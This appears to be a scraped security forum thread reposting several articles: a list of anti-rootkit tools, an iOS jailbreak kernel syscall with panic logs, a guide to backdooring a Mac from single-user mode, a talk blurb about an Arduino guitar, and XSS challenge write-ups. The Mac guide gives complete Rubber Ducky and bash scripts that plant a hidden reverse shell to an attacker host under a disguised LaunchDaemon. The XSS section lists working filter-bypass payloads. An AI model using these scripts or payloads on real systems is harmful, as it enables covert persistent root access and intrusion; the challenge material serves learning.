Anti-Rootkit BETA - current version 1.07.0.1008. Download, run the file to extract it where you wish and then it runs. Follow steps accordingly. The page linked has some more details you probably want to review first. Comes up often in forum referrals as one of the top-referred cleaning tools FWIW. McAfee RootkitRemover - version 0.8.9.170 released 10-25-2013 so it is still mostly fresh. Guide can be located at this McAfee link How to Use RootkitRemover. NoVirusThanks Anti-Rootkit: Low-level system analysis tool - version 1.2.0.0 released 01-15-2011. Norton Power Eraser - Free tool from Symantec. Usage guide here. I downloaded the binary today and the file details reports it is version 4.0.0.57. PowerTool Anti Virus&Rootkit Tool (x86/x64) - This is a new find to me. Offered in both x32 and x64 flavors. Appears to have had the most recent version release on 12-01-2013. Imgur has some great screenshots of version 4.2 here. The tool provides a significant number of system analysis points and data. Forum posts report earlier versions were buggy and lead to BSOD system crashes. You may want to try it out on a virtual Windows system first to check compatibility and stability before running on a production system. Rkdetector - Microsoft Rootkit Detector v2.0 2005 © - More of a system analysis tool than an actual “remover” product. Helpful for advanced responders. Superseded now by their SanityCheck tool. RogueKiller - Offered in both x32 and x64 bit apps, latest version at time of posting is v 8.7.14 released on 12-27-2013. In addition to malware/AV scan and removal it also handles some root-kits/boot-kits and MBR infections as well as some Cryptolocker pattern detections. Review the Official Tutorial for more information. Note that the page clearly states in the disclaimer that use of the tool does send feedback to the developers automatically. Be sure you read their full statement before deciding to use. That’s not necessarily a deal-breaker for me but it may be against your comfort level and/or security policies. RootKit Hook Analyzer - Another older (discontinued) analyzer product. I still have the original files myself but you cannot easily find and download them any longer. From Resplendence. RootkitRevealer - Windows Sysinternals - really depreciated now but I just needed to list it for old-time’s sake. Only supported under Windows XP and Server 2003. Was helpful in its day. Was one of my very first anti-rootkit detection tools. rootrepeal - version 1.3.5 and supports at least Windows XP though Vista. Hasn’t appeared to been updated since 2009. Was more useful for analysis of running processes and looking for hidden/hooked services rather than actual removal work…though you can try to use it to “clean” files manually that are found. SanityCheck, Advanced Rootkit and Malware Detector - Resplendence - version 3.00 supports Windows 8 and Server 2012 (and almost all older version of Windows as well). Scans for malware/rootkits and is extra-nice in that it provides a detailed report of findings for use in analysis and response efforts. See the feature list for more details and background. Also contains an optional “expert mode” that can be used to give super-detailed feedback. free home edition and for purchase for Pro edition. Sophos Anti-Rootkit Tool (SAR) - supported on Windows OS systems from 200 through Win 7. Doesn’t specifically says supports Windows 8 but might. Many more details including video and CLI help: Sophos Anti-Rootkit: Overview Stream Armor - Advanced Tool to Scan & Clean Malicious Alternate Data Streams (ADS) - offered by www.SecurityXploded.com. Portable tool (installation option available) supports OS systems from Windows XP to Win 8. as of post time, version is 2.5 released 03-22-2013. Trend Micro Rootkit Buster - Free tool offered in both X32 & x64 bit versions. Requires installation on the system. Appears to be last released 03-05-2013 as of the time of this post. Version is 5.00.1129. See these (x32)ReadMe and (x64)ReadMe txt files Trend Micro offers on the download page. I generally don’t rely on these tools during an incident response unless “something” indicates to me a deeper bootkit/rootkit scan is in order. Otherwise, I’m using my primary first-line response and detection tools as posted in the Anti-Malware Response “Go-Kit” post. Testing and evaluation of the tools you use is critical to validate they have worth. Just because I or others recommend a particular tool does not necessarily mean it will be effective or helpful in your particular environment or against every threat. And when dealing with these particular classes of threats, you might break your OS in the repair attempt. I did find this old (published September 2007) guide from Symantec that might be worth looking at still, A Testing Methodology for Rootkit Removal Effectiveness (PDF file link) from Josh Harriman. I’m sure I’ve left some additional tools out that other GSD users may have found valuable. If so and you have any additional recommendations to offer, please leave a note in the comments. Likewise for any more recent anti-rootkit/anti-bootkit testing & detection methodology documents or posts. Cheers, Claus Valca Sursa: grand stream dreams: “Advanced” Anti-Rootkit Tool List - Mostly Modern
  12. [h=1]Evading iOS Security[/h]Here’s some code: main() { syscall(0, 0x41414141, -1); } Here’s what happens when you run it on a device using evasi0n7: panic(cpu 0 caller 0x9dc204d7): sleh_abort: prefetch abort in kernel mode: fault_addr=0x41414140 r0: 0xffffffff r1: 0x27dffdec r2: 0x2bf0e9c4 r3: 0x2bf0e95c r4: 0x41414141 r5: 0xa48782d4 r6: 0x81b6f594 r7: 0x8f5d3fa8 r8: 0x9df1d614 r9: 0x81b6f330 r10: 0x9df1db00 r11: 0x00000006 r12: 0x00000000 sp: 0x8f5d3f60 lr: 0x93dd7048 pc: 0x41414140 cpsr: 0x20000033 fsr: 0x00000005 far: 0x41414140 And here’s what happens on an ARM64 device that also uses evasi0n7: panic(cpu 0 caller 0xffffff801522194c): PC alignment exception from kernel. (saved state: 0xffffff800dbc4640) x0: 0x2bea99c400401e08 x1: 0x00402fe92bea995c x2: 0xbdf4cd1500403008 x3: 0x0040156400000000 x4: 0x0040156400000000 x5: 0x000000002bea995c x6: 0x00402fe92bea995c x7: 0xffffff80975df438 x8: 0xffffffff41414141 x9: 0x000000000000000e x10: 0xffffff8096f9b100 x11: 0x0000000000000000 x12: 0x0000000003000004 x13: 0x0000000000401420 x14: 0x000000002be925a1 x15: 0x0000000000402ffe x16: 0x0000000000000000 x17: 0x0000000000000000 x18: 0x0000000000000000 x19: 0xffffff8096f9b410 x20: 0xffffff80977203f0 x21: 0xffffff80975df438 x22: 0xffffff80155ea3c8 x23: 0x0000000000000018 x24: 0xffffff8096f9b418 x25: 0x0000000000000000 x26: 0x0000000000000006 x27: 0x0000000000000000 x28: 0xffffff80155ea3c8 fp: 0xffffff800dbc4a60 lr: 0xffffff8015362434 sp: 0xffffff800dbc4990 pc: 0xffffffff41414141 cpsr: 0x60000304 esr: 0x8a000000 far: 0xffffffff41414141 ..And here’s the system call handler for system call 0… (ARM32 of course!) __text:00000000 CODE32 __text:00000000 STMFD SP!, {R4-R7,LR} __text:00000004 MOV R5, R2 __text:00000008 MOV R6, R1 __text:0000000C LDR R0, =0x9E415A34 __text:00000010 BLX R0 __text:00000014 LDR R0, =0x9E41E160 __text:00000018 BLX R0 __text:0000001C LDR R0, =0x9E415958 __text:00000020 BLX R0 __text:00000024 LDR R0, [R6] __text:00000028 CMP R0, #0 __text:0000002C BEQ locret_50 __text:00000030 MOV R4, R0 __text:00000034 LDR R0, [R6,#4] __text:00000038 LDR R1, [R6,#8] __text:0000003C LDR R2, [R6,#0xC] __text:00000040 LDR R3, [R6,#0x10] __text:00000044 BLX R4 __text:00000048 STR R0, [R5] __text:0000004C MOV R0, #0 __text:00000050 __text:00000050 locret_50 ; CODE XREF: __text:0000002Cj __text:00000050 LDMFD SP!, {R4-R7,PC} __text:00000050 ; --------------------------------------------------------------------------- __text:00000054 off_54 DCD 0x9E415A34 ; DATA XREF: __text:0000000Cr __text:00000058 off_58 DCD 0x9E41E160 ; DATA XREF: __text:00000014r __text:0000005C off_5C DCD 0x9E415958 ; DATA XREF: __text:0000001Cr Jailbreaking ruins security and integrity. Enough said. Have a good day. (Oh, it also can be used by any user, including mobile. One can wonder if TaiG or such is using this as a back door…) Sursa: Evading iOS Security – winocmblag
  13. Root a Mac in 10 seconds or less Posted on November 18, 2013 by Patrick Mosca Often times, physical access to a machine means game over. While people like to think that OSX is immune to most security threats, even Apple computers can be susceptible to physical attacks. Mac OSX is capable of booting into single user mode by holding a special key combination (Command-S). From this point, an attacker has root access to the entire computer. Note that this is not a security exploit, but rather an intentionally designed feature. While of course the intruder needs to be physically present, this can become a huge security problem. (There is proven method for preventing this attack that I will cover at the end of the article.) Since physical access to the machine is required, time is precious and must be cut to a minimum. There are two methods for optimizing time, scripts and a little tool called the USB Rubber Ducky. The Rubber Ducky is small HID that looks like a flash drive and acts like a keyboard. It is designed to pound out scripts at freakish speeds, as if you were typing it yourself. Of course, a flash drive will work too. This backdoor is almost identical to the basic backdoor described in OSX Backdoor – Persistence. Read that article if you would like to better understand the inner workings of this backdoor. Similarly, we will create a script that sends a shell back home through netcat. Finally, we will add the script as a Launch Daemons where it will be executed as root every 60 seconds. The Rubber Ducky Method 1) Download the Ducky Decoder and Firmware from here. Be sure to use duck_v2.1.hex or above. There are instructions on how to flash your ducky. At the time of writing this, I used Ducky Decoder v2.4 and duck_v2.1.hex firmware. (Special thanks to midnitesnake for patching the firmware) 2) Create the script source.txt. Be sure to replace mysite.com with your IP address or domain name. Similarly, place your port number 1337 on the same line. REM Patrick Mosca REM A simple script for rooting OSX from single user mode. REM Change mysite.com to your domain name or IP address REM Change 1337 to your port number REM Catch the shell with 'nc -l -p 1337' DELAY 1000 STRING mount -uw / ENTER DELAY 2000 STRING mkdir /Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/bash ENTER STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 ENTER STRING wait' > /Library/.hidden/connect.sh ENTER DELAY 500 STRING chmod +x /Library/.hidden/connect.sh ENTER DELAY 200 STRING mkdir /Library/LaunchDaemons ENTER DELAY 200 STRING echo ' ENTER STRING ENTER STRING Label ENTER STRING com.apples.services ENTER STRING ProgramArguments ENTER STRING ENTER STRING /bin/sh ENTER STRING /Library/.hidden/connect.sh ENTER STRING ENTER STRING RunAtLoad ENTER STRING ENTER STRING StartInterval ENTER STRING 60 ENTER STRING AbandonProcessGroup ENTER STRING ENTER STRING ENTER STRING ' > /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 500 STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 200 STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 1000 STRING shutdown -h now ENTER 3) Compile and install the script. From within the ducky decoder folder, execute: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]java -jar encoder.jar -i source.txt -o inject.bin -l us [/TD] [/TR] [/TABLE] Move your inject.bin over to the ducky. 4) Boot into single user mode (Command – S). 5) At the command prompt, plug in ducky. 6) Catch your shell. [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]nc -l -p 1337 [/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]nc -l 1337 [/TD] [/TR] [/TABLE] Say hello! You are now root The USB Flash Drive Method 1) Create the file install.bash on a flash drive. #!/bin/bash #Create the hidden directory /Library/.hidden mkdir /Library/.hidden #Copy the script to hidden folder echo " #!/bin/bash bash -i >& /dev/tcp/mysite.com/1337 0>&1 wait" > /Library/.hidden/connect.sh #Give the script permission to execute chmod +x /Library/.hidden/connect.sh #Create directory if it doesn't already exist. mkdir /Library/LaunchDaemons #Write the .plist to LaunchDaemons echo ' Label com.apples.services ProgramArguments /bin/sh /Library/.hidden/connect.sh RunAtLoad StartInterval 60 AbandonProcessGroup ' > /Library/LaunchDaemons/com.apples.services.plist chmod 600 /Library/LaunchDaemons/com.apples.services.plist #Load the LaunchAgent launchctl load /Library/LaunchDaemons/com.apples.services.plist shutdown -h now 2) Boot into single user mode (Command – S). 3) Execute the commands. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11[/TD] [TD=class: code]mount -uw / mkdir /Volumes/usb ls /dev mount_msdos /dev/disk1s1 /Volumes/usb cd /Volumes/usb ./install.bash [/TD] [/TR] [/TABLE] disk1s1 will change! If you’re not sure which device is your flash, take out your device, list devices, put your flash drive back in, and list devices. Your flash drive will be the device that has come and gone. 4) Catch your shell. [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]nc -l -p 1337 [/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]nc -l 1337 [/TD] [/TR] [/TABLE] The difference between the USB Rubber Ducky method and the flash drive method is night and day. There is a little more preparation that goes into setting up the ducky, but execution time is prime. When time is of the essence, listing devices, making directories, and mounting flash drives can impede on an “operation.” Either route you choose, both methods will ensure a persistent backdoor as the root user As for preventing this lethal attack, there are two possible defenses. Locking the EFI firmware will prevent users from accessing single user mode by locking single user mode with a password. Don’t do this. It is a complete waste of time. The password can be reset by removing physical RAM and resetting the PRAM as described here. The only sure way to prevent unwanted root access to your system is by simply enabling File Vault’s full disk encryption (not home folder encryption!). Since this encrypts the entire drive, it is will be impossible to access single user mode without the (strong) password. Problem solved. This article was written to show the vulnerabilities of Macs without full disk encryption or locked EFI firmware. Please no one get in trouble. It is very easy to sniff the wire and find the attacker’s IP address that is causing excessive noise every 60 seconds. I put the script and version 2.6.3 of the ducky encoder on Github for convenience. If you found this interesting, give a star. Thanks for reading. Sursa: Root a Mac in 10 seconds or less | Patrick Mosca
  14. 30c3 - The Arduguitar: An Ardunio Powered Electric Guitar Description: The ArduGuitar An Ardunio Powered Electric Guitar The ArduGuitar is an electric guitar with no physical controls, i.e. no buttons or knobs to adjust volume, tone or to select the pickups. All of these functions are performed remotely via a bluetooth device such as an Android phone, or via a dedicated Arduino powered blutetooth footpedal. The musician still plucks the strings, of course! This talk will give an overview of the technology and particularly the voyage that took me from nearly no knowledge about anything electronic to enough know-how to make it all work.I will explain what I learned by collaborating on forums, with Hackerspaces and with component providers: "How to ask the right questions." The guitar with its Arduino powered circuit and an Android tablet will be available for demo; the code is all available on the github arduguitar repo with the associated Arduino footpedal libraries. For More Information please visit : - https://events.ccc.de/congress/2013/wiki/Main_Page Sursa: 30c3 - The Arduguitar: An Ardunio Powered Electric Guitar
  15. escape.alf.nu XSS Challenges Write-ups (Part 2) These are my solutions to Erling Ellingsen escape.alf.nu XSS challenges. I found them very interesting and I learnt a lot from them (especially from the last ones published in this post). Im publishing my results since the game has been online for a long time now and there are already some sites with partial results. My suggestion, if you havent done it so far, is to go and try to solve them by yourselves…. so come on, dont be lazy, stop reading here and give them a try … … … … … Ok so if you have already solve them or need some hints, here are my solutions Level 9: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7[/TD] [TD=class: code]function escape(s) { // This is sort of a spoiler for the last level if (/[\\<>]/.test(s)) return '-'; return '<script>console.log("' + s.toUpperCase() + '")</script>'; }[/TD] [/TR] [/TABLE] Some as level 8 but now we cannot use angle brackets (<>) nor backslashes (\) Solutions: Is it possible to use an online non-alphanumeric encoder to encode the following payload so it uses no alpha characters, angle brackets (<>) nor backslashes (\) [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+alert(1))//[/TD] [/TR] [/TABLE] Producing a huge solution (5627): [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+(+!![]+[])+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])))())//[/TD] [/TR] [/TABLE] We can also try to use our own minimization using the letters in “false”, “true”, “undefined” and “object”: [TABLE] [TR] [TD]”+!1[/TD] [TD]false[/TD] [/TR] [TR] [TD]”+!0[/TD] [TD]true[/TD] [/TR] [TR] [TD]”+{}[0][/TD] [TD]undefined[/TD] [/TR] [TR] [TD]”+{}[/TD] [TD][object Object][/TD] [/TR] [/TABLE] Strings we will need: [TABLE] [TR] [TD]sort[/TD] [TD][(”+!1)[3]+(”+{})[1]+(”+!0)[1]+(”+!0)[0]][/TD] [/TR] [TR] [TD]constructor[/TD] [TD][(”+{})[5]+(”+{})[1]+(”+{}[0])[1]+(”+!1)[3]+(”+!0)[0]+(”+!0)[1]+(”+!0)[2]+(”+{})[5]+(”+!0)[0]+(”+{})[1]+(”+!0)[1]][/TD] [/TR] [TR] [TD]alert(1)[/TD] [TD](”+!1)[1] + (”+!1)[2] + (”+!1)[4] +(”+!0)[1]+(”+!0)[0]+”(1)”[/TD] [/TR] [/TABLE] We will replace the call to alert(1) in our payload: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+alert(1))//[/TD] [/TR] [/TABLE] with the following one so we can simplify the encoding to encode strings. [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+[]["sort"]["constructor"]("alert(1)")()//[/TD] [/TR] [/TABLE] Note: Many other alternatives are possible like: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+(0)['constructor']['constructor']("alert(1)")()//[/TD] [/TR] [/TABLE] But I found the “sort” one to be the shortest (with other 4 letter functions like “trim”) This is a 246 characters solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+[][(''+!1)[3]+(''+{})[1]+(''+!0)[1]+(''+!0)[0]][(''+{})[5]+(''+{})[1]+(''+{}[0])[1]+(''+!1)[3]+(''+!0)[0]+(''+!0)[1]+(''+!0)[2]+(''+{})[5]+(''+!0)[0]+(''+{})[1]+(''+!0)[1]]((''+!1)[1] + (''+!1)[2] + (''+!1)[4] +(''+!0)[1]+(''+!0)[0]+"(1)")())//[/TD] [/TR] [/TABLE] We can improve it by defining a variable containing all our letters and then just referencing it: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]_=''+!1+!0+{}[0]+{} = "falsetrueundefined[object Object]"[/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]");_=''+!1+!0+{}[0]+{};[][_[3]+_[19]+_[6]+_[5]][_[23]+_[19]+_[10]+_[3]+_[5]+_[6]+_[7]+_[23]+_[5]+_[19]+_[6]](_[1]+_[2]+_[4]+_[6]+_[5]+'(1)')()//[/TD] [/TR] [/TABLE] Now the solution is 144 characters which is still far from the winners: Next iteratation is to change the base payload for something sorter like window.alert(1) In chrome, we can leak a reference to window with: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](0,[]["concat"])()[0][/TD] [/TR] [/TABLE] So using the same strings as above we get the following 100 characters solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]");_=""+!1+!0+{}[0]+{};(0,[][_[23]+_[19]+_[10]+_[23]+_[1]+_[5]])()[0][_[1]+_[2]+_[4]+_[6]+_[5]](1)//[/TD] [/TR] [/TABLE] We are still taking too many chars for defining our alphabet. Here is where Mario surprised me once again with this tweet: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]");(_=!1+URL+!0,[][_[8]+_[11]+_[7]+_[8]+_[1]+_[9]])()[0][_[1]+_[2]+_[4]+_[38]+_[9]](1)//[/TD] [/TR] [/TABLE] Note that he is using !1+URL+!0 as the alphabet string and it difers for different browsers: Firefox: [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]_=!1+URL+!0="falsefunction URL() { [native code] }true"[/TD] [/TR] [/TABLE] Chrome: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]_=!1+URL+!0="falsefunction URL() { [native code] }true"[/TD] [/TR] [/TABLE] Other interesting Mario ’s finding is that inside with-statements, almost everything leaks [object Window] for example: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]with(0) x=[].sort,)[/TD] [/TR] [/TABLE] Level 10: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26[/TD] [TD=class: code]function escape(s) { function htmlEscape(s) { return s.replace(/./g, function(x) { return { '<': '<', '>': '>', '&': '&', '"': '"', "'": ''' }[x] || x; }); } function expandTemplate(template, args) { return template.replace( /{(\w+)}/g, function(_, n) { return htmlEscape(args[n]); }); } return expandTemplate( " \n\ <h2>Hello, <span id=name></span>!</h2> \n\ <script> \n\ var v = document.getElementById('name'); \n\ v.innerHTML = '<a href=#>{name}</a>'; \n\ <\/script> \n\ ", { name : s } ); }[/TD] [/TR] [/TABLE] Injection takes place in a JS string context and since “\” is not escaped in the htmlEscape function, we can use hex or octal encoding for the “<” symbol and bypass the escaping function. Valid solutions: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]\x3csvg onload=alert(1)[/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]\74svg onload=alert(1)[/TD] [/TR] [/TABLE] Level 11: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6[/TD] [TD=class: code]function escape(s) { // Spoiler for level 2 s = JSON.stringify(s).replace(/<\/script/gi, ''); return '<script>console.log(' + s + ');</script>'; }[/TD] [/TR] [/TABLE] I’ve seen similar escaping functions in real applications, normally it is not a good idea to fix the input data, you either accept it or reject it but trying to fix it normally leads to bypasses. In this case the escape function replaces “</script” with an empty string so shortest solution is: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]</</scriptscript><script>alert(1)//[/TD] [/TR] [/TABLE] Level 12: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9[/TD] [TD=class: code]function escape(s) { // Pass inn "callback#userdata" var thing = s.split(/#/); if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback'; var obj = {'userdata': thing[1] }; var json = JSON.stringify(obj).replace(/\//g, '\\/'); return "<script>" + thing[0] + "(" + json +")</script>"; }[/TD] [/TR] [/TABLE] Similar to level 7 but this time the backslash is also escaped so we use a similar vector with a different way to comment the junk out: Solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]'#';alert(1)<!--[/TD] [/TR] [/TABLE] It will render: [TABLE] 